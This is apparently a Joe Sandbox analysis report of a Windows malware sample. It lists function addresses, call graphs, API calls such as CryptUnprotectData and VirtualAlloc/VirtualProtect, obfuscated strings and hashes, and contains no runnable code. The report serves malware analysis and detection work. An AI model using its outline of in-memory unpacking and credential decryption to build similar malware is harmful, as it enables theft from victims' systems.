RtlAllocateHeap 21326->21327 21328 416cc3 21327->21328 21328->21328 21329 41c0f0 21330 41c150 21329->21330 21331 41c0fc 21329->21331 21332 435440 RtlAllocateHeap 21331->21332 21333 41c164 21332->21333 21334 435440 RtlAllocateHeap 21333->21334 21334->21330 21491 419db0 21492 419dbe 21491->21492 21496 419e00 21491->21496 21493 435440 RtlAllocateHeap 21492->21493 21495 419e14 21493->21495 21495->21495 21497 419ec0 21495->21497 21498 419f2d 21497->21498 21499 435440 RtlAllocateHeap 21498->21499 21500 419fb2 21499->21500 21500->21500 21501 43a250 2 API calls 21500->21501 21502 41a01d 21501->21502 21335 41baf3 21336 435440 RtlAllocateHeap 21335->21336 21337 41bb0a 21336->21337 21342 413cf5 21343 413d05 21342->21343 21370 41cfa0 21343->21370 21345 413d0b 21346 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21345->21346 21347 413d15 21346->21347 21348 41d8e0 6 API calls 21347->21348 21349 413d28 21348->21349 21350 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21349->21350 21351 413d32 21350->21351 21352 41db10 LdrInitializeThunk 21351->21352 21353 413d48 21352->21353 21354 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21353->21354 21355 413d52 21354->21355 21356 41fd10 RtlAllocateHeap LdrInitializeThunk 21355->21356 21357 413d68 21356->21357 21358 420880 RtlAllocateHeap LdrInitializeThunk 21357->21358 21359 413d71 21358->21359 21360 420d60 LdrInitializeThunk 21359->21360 21361 413d7a 21360->21361 21362 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21361->21362 21363 413d84 21362->21363 21364 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21363->21364 21365 413da4 21364->21365 21366 425260 RtlAllocateHeap 21365->21366 21367 413dba 21366->21367 21368 42eab0 6 API calls 21367->21368 21369 413dc3 21368->21369 21371 41d016 21370->21371 21372 41d069 RtlExpandEnvironmentStrings 21370->21372 21371->21372 21373 41d0ae 21372->21373 21374 435440 RtlAllocateHeap 21373->21374 21375 41d0be RtlExpandEnvironmentStrings 21374->21375 21376 41d13b 21375->21376 21377 435440 RtlAllocateHeap 21376->21377 21378 41d1ca 21377->21378 21378->21378 21379 43a250 2 API calls 21378->21379 21380 41d247 21379->21380 21381 42f3f6 21384 42fae0 21381->21384 21385 42fb34 21384->21385 21386 435440 RtlAllocateHeap 21385->21386 21387 42fc14 21386->21387 21388 431df6 21389 431dfb 21388->21389 21390 435440 RtlAllocateHeap 21389->21390 21391 431e09 21390->21391 21392 43a530 LdrInitializeThunk 21391->21392 21393 431e33 21392->21393 21503 43803b 21505 437f65 21503->21505 21504 4380c5 21505->21503 21505->21504 21507 4373e0 LdrInitializeThunk 21505->21507 21507->21505 21394 41a77a 21395 41a793 21394->21395 21398 41a800 21395->21398 21399 43a060 2 API calls 21398->21399 21400 41a859 21399->21400 21401 4372f8 21402 437380 RtlAllocateHeap 21401->21402 21403 437348 21401->21403 21404 4373a0 21402->21404 21403->21402 21405 4337fd 21408 439500 21405->21408 21407 43382b GetVolumeInformationW 21512 43793d 21513 437982 21512->21513 21515 4379ee 21513->21515 21516 4373e0 LdrInitializeThunk 21513->21516 21516->21515 21409 41537e 21410 415388 21409->21410 21411 435440 RtlAllocateHeap 21410->21411 21413 4154e8 21411->21413 21412 415635 CryptUnprotectData 21413->21412

                                                            Executed Functions

                                                            Function 0042EC90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                            • String ID:
                                                            • API String ID: 1449868515-3916222277
                                                            • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                            • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                            • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                            • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                            Function 00427353 Relevance: 9.9, APIs: 2, Strings: 3, Instructions: 1198COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2PBb$Yceh$]hW9
                                                            • API String ID: 0-1551782443
                                                            • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                            • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                            • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                            • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55
                                                            Function 0041FD10 Relevance: 6.8, Strings: 5, Instructions: 531COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 419 41fd10-41fd3b 420 41fdc0-41ff6c 419->420 421 420000-4201ac 419->421 422 41fd42-41fd4f 419->422 423 41ffb4-41ffb7 419->423 424 41fd8c 419->424 425 41ffbe-41ffe5 call 43ad30 419->425 431 41ff97-41ffa6 call 43a900 420->431 432 41ff6e-41ff6f 420->432 429 4201d7-4201eb call 43a900 421->429 430 4201ae-4201af 421->430 422->422 426 41fd70-41fd7e 422->426 427 41fda0-41fdaf 422->427 428 41fd85 422->428 423->425 433 420200-42020a 423->433 434 420220-42026d call 437200 423->434 435 41ffec 423->435 424->427 425->434 425->435 426->422 426->428 427->420 427->422 427->428 428->424 429->433 438 4201b0-4201d5 430->438 444 41ffab 431->444 440 41ff70-41ff95 432->440 433->434 446 420502-420507 434->446 447 420523-42056f 434->447 448 4204a0-4204ab 434->448 449 420280-420291 call 43a900 434->449 450 4202a5 434->450 451 420645-42064c 434->451 452 42062f 434->452 453 4204ec 434->453 454 420512-42051c 434->454 455 420653-42065d 434->455 456 4202b0-420325 434->456 457 420510 434->457 458 4204f6-4204ff call 4087a0 434->458 459 420636-42063e 434->459 460 420397 434->460 461 420399-4203a1 434->461 462 42061e-420628 434->462 435->421 438->429 438->438 440->431 440->440 444->423 446->457 466 4205b0-4205b8 447->466 467 420571 447->467 470 4204b2-4204d0 call 435440 call 43aa50 448->470 471 4204ad 448->471 473 420296-42029e 449->473 450->456 451->455 451->459 452->459 453->458 454->446 454->447 454->448 454->449 454->450 454->451 454->452 454->453 454->454 454->455 454->456 454->457 454->458 454->459 454->460 454->461 454->462 455->446 455->447 455->448 455->449 455->450 455->451 455->452 455->453 455->454 455->455 455->456 455->457 455->458 455->459 455->460 455->461 455->462 463 420372-420383 call 43b430 456->463 464 420327 456->464 458->446 459->446 459->447 459->448 459->449 459->450 459->451 459->452 459->453 459->454 459->455 459->456 459->457 459->458 459->459 459->460 459->461 459->462 460->461 468 4203a3-4203a7 461->468 469 4203c1-420408 461->469 462->451 462->452 462->455 462->459 484 420388-420390 463->484 474 420330-420370 464->474 479 420600-420617 call 439e00 466->479 480 4205ba-4205c6 466->480 477 420580-4205ae 467->477 478 4203b0-4203bf 468->478 481 420440-420448 469->481 482 42040a 469->482 496 4204d5-4204e5 470->496 471->470 473->446 473->450 473->451 473->452 473->454 473->455 473->456 473->457 473->458 473->459 473->460 473->461 473->462 474->463 474->474 477->466 477->477 478->469 478->478 479->451 479->452 479->455 479->459 479->462 485 4205d0-4205d7 480->485 487 420490 481->487 488 42044a-420455 481->488 486 420410-42043e 482->486 484->446 484->451 484->452 484->454 484->455 484->457 484->458 484->459 484->460 484->461 484->462 491 4205e0-4205e6 485->491 492 4205d9-4205dc 485->492 486->481 486->486 487->448 494 420460-420467 488->494 491->479 498 4205e8-4205fa call 4373e0 491->498 492->485 497 4205de 492->497 499 420470-420476 494->499 500 420469-42046c 494->500 496->446 496->449 496->450 496->451 496->452 496->453 496->454 496->455 496->456 496->457 496->458 496->459 496->460 496->461 496->462 497->479 498->479 499->487 503 420478-42048f call 4373e0 499->503 500->494 502 42046e 500->502 502->487 503->487
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb$gdeb$rr$}x$a_
                                                            • API String ID: 0-3617765606
                                                            • Opcode ID: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                            • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                            • Opcode Fuzzy Hash: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                            • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96
                                                            Function 00409960 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 507 409960-409973 508 409975-409981 507->508 509 4099c7-4099c9 507->509 510 409983-409985 508->510 511 4099ce-4099db 508->511 512 40a0c9-40a0d2 509->512 513 409987-4099c5 510->513 514 4099dd-4099e4 510->514 515 409a12-409aa1 call 4067b0 call 4336f0 call 435440 511->515 516 4099e6-4099fb 513->516 514->516 517 4099fd-409a0d 514->517 524 409aa3 515->524 525 409ae8-409b42 call 4091c0 515->525 516->515 517->515 526 409ab0-409ae6 524->526 529 409b44 525->529 530 409b96-409bfa call 4091c0 525->530 526->525 526->526 531 409b50-409b94 529->531 534 409c30-409c8a call 4091c0 530->534 535 409bfc-409bff 530->535 531->530 531->531 539 409cbb-409d07 534->539 540 409c8c-409c8f 534->540 536 409c00-409c2e 535->536 536->534 536->536 542 409d09 539->542 543 409d4d-409db2 call 4091c0 539->543 541 409c90-409cb9 540->541 541->539 541->541 544 409d10-409d4b 542->544 547 409db4 543->547 548 409df8-409faf call 409480 543->548 544->543 544->544 549 409dc0-409df6 547->549 552 409fb1 548->552 553 40a002-40a048 548->553 549->548 549->549 554 409fc0-40a000 552->554 555 40a094-40a0b4 call 40d380 call 4087a0 553->555 556 40a04a 553->556 554->553 554->554 561 40a0b9-40a0c2 555->561 557 40a050-40a092 556->557 557->555 557->557 561->512
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$01$ZR\;$[hct${hmn
                                                            • API String ID: 0-1484469362
                                                            • Opcode ID: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                            • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                            • Opcode Fuzzy Hash: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                            • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                            Function 0041537E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: CryptDataUnprotect
                                                            • String ID: .$=
                                                            • API String ID: 834300711-1678909263
                                                            • Opcode ID: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                            • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                            • Opcode Fuzzy Hash: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                            • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                            Function 007BE78E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007BE7B6
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 007BE7D6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: e77da6e9868a3ea2bbb6b69702ad2be4833759a85dd3d186b2deded3b27b49b9
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 4EF09631200710ABE7203BF5AC8DBEE76ECEF49724F100529F642912C0DF74EC454A61
                                                            Function 00404970 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$IEND
                                                            • API String ID: 0-707183367
                                                            • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                            • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                            • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                            • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                            Function 00420880 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: ]hiX$gdeb
                                                            • API String ID: 2994545307-4273025081
                                                            • Opcode ID: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                            • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                            • Opcode Fuzzy Hash: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                            • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                            Function 004168EF Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: IO
                                                            • API String ID: 0-3981347273
                                                            • Opcode ID: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                            • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                            • Opcode Fuzzy Hash: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                            • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                            Function 00415FE1 Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                            • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                            • Opcode Fuzzy Hash: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                            • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                            Function 0042B20E Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                            • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                            • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                            • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86
                                                            Function 0214003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 26 214003c-2140047 27 214004c-2140263 call 2140a3f call 2140e0f call 2140d90 VirtualAlloc 26->27 28 2140049 26->28 44 2140265-2140289 call 2140a69 27->44 45 214028b-2140292 27->45 30 214004a 28->30 30->30 50 21402ce-21403c2 VirtualProtect call 2140cce call 2140ce7 44->50 47 21402a1-21402b0 45->47 49 21402b2-21402cc 47->49 47->50 49->47 56 21403d1-21403e0 50->56 57 21403e2-2140437 call 2140ce7 56->57 58 2140439-21404b8 VirtualFree 56->58 57->56 60 21405f4-21405fe 58->60 61 21404be-21404cd 58->61 64 2140604-214060d 60->64 65 214077f-2140789 60->65 63 21404d3-21404dd 61->63 63->60 69 21404e3-2140505 LoadLibraryA 63->69 64->65 70 2140613-2140637 64->70 67 21407a6-21407b0 65->67 68 214078b-21407a3 65->68 71 21407b6-21407cb 67->71 72 214086e-21408be LoadLibraryA 67->72 68->67 73 2140517-2140520 69->73 74 2140507-2140515 69->74 75 214063e-2140648 70->75 76 21407d2-21407d5 71->76 80 21408c7-21408f9 72->80 77 2140526-2140547 73->77 74->77 75->65 78 214064e-214065a 75->78 81 2140824-2140833 76->81 82 21407d7-21407e0 76->82 83 214054d-2140550 77->83 78->65 79 2140660-214066a 78->79 86 214067a-2140689 79->86 88 2140902-214091d 80->88 89 21408fb-2140901 80->89 87 2140839-214083c 81->87 90 21407e4-2140822 82->90 91 21407e2 82->91 84 2140556-214056b 83->84 85 21405e0-21405ef 83->85 92 214056d 84->92 93 214056f-214057a 84->93 85->63 94 2140750-214077a 86->94 95 214068f-21406b2 86->95 87->72 96 214083e-2140847 87->96 89->88 90->76 91->81 92->85 97 214057c-2140599 93->97 98 214059b-21405bb 93->98 94->75 99 21406b4-21406ed 95->99 100 21406ef-21406fc 95->100 101 2140849 96->101 102 214084b-214086c 96->102 110 21405bd-21405db 97->110 98->110 99->100 104 21406fe-2140748 100->104 105 214074b 100->105 101->72 102->87 104->105 105->86 110->83
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0214024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: 48cea063c97ef949dd5434e3ad27270cf03c1d81571c479ac5389c31e4d80e02
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 52527974A01229DFDB64CF59C984BACBBB1BF09304F1580E9E94DAB351DB30AA85DF14
                                                            Function 0041CFA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 307 41cfa0-41d014 308 41d016 307->308 309 41d069-41d0ac RtlExpandEnvironmentStrings 307->309 310 41d020-41d067 308->310 311 41d0b5 309->311 312 41d0ae-41d0b3 309->312 310->309 310->310 313 41d0b8-41d139 call 435440 RtlExpandEnvironmentStrings 311->313 312->313 316 41d189-41d1b6 313->316 317 41d13b 313->317 319 41d1b8-41d1bd 316->319 320 41d1bf-41d1c1 316->320 318 41d140-41d187 317->318 318->316 318->318 321 41d1c4-41d1db call 435440 319->321 320->321 324 41d201-41d211 321->324 325 41d1dd-41d1e6 321->325 327 41d231-41d242 call 43a250 324->327 328 41d213-41d21a 324->328 326 41d1f0-41d1ff 325->326 326->324 326->326 331 41d247-41d263 327->331 329 41d220-41d22f 328->329 329->327 329->329
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: K-K/$U5U7$\1B3
                                                            • API String ID: 237503144-1235027928
                                                            • Opcode ID: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                            • Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
                                                            • Opcode Fuzzy Hash: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                            • Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7
                                                            Function 0041D8E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 380 41d8e0-41d993 381 41d9d5-41da15 RtlExpandEnvironmentStrings 380->381 382 41d995 380->382 384 41da17-41da1c 381->384 385 41da1e 381->385 383 41d9a0-41d9d3 382->383 383->381 383->383 386 41da21-41da9f call 435440 RtlExpandEnvironmentStrings 384->386 385->386 389 41dae1-41daea call 417a30 386->389 390 41daa1 386->390 393 41daef-41daf2 389->393 391 41dab0-41dadf 390->391 391->389 391->391
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: eI.K$qs
                                                            • API String ID: 237503144-3936219367
                                                            • Opcode ID: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                            • Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
                                                            • Opcode Fuzzy Hash: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                            • Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98
                                                            Function 00408EA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 394 408ea0-408ead call 436950 397 408eb1-408eb8 call 431710 394->397 398 408eaf 394->398 402 408eba 397->402 403 408ebc-408ef7 GetStdHandle GetConsoleWindow call 408f20 call 40a390 397->403 399 408f0b-408f14 ExitProcess 398->399 404 408f04-408f09 call 4371d0 402->404 411 408ef9 403->411 412 408efb call 40f5b0 403->412 404->399 413 408f02 411->413 415 408f00 412->415 413->404 415->413
                                                            APIs
                                                            Strings
                                                            • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                            • API String ID: 621844428-2804141084
                                                            • Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                            • Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
                                                            • Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                            • Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F
                                                            Function 004337FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 416 4337fd-43385d call 439500 GetVolumeInformationW
                                                            APIs
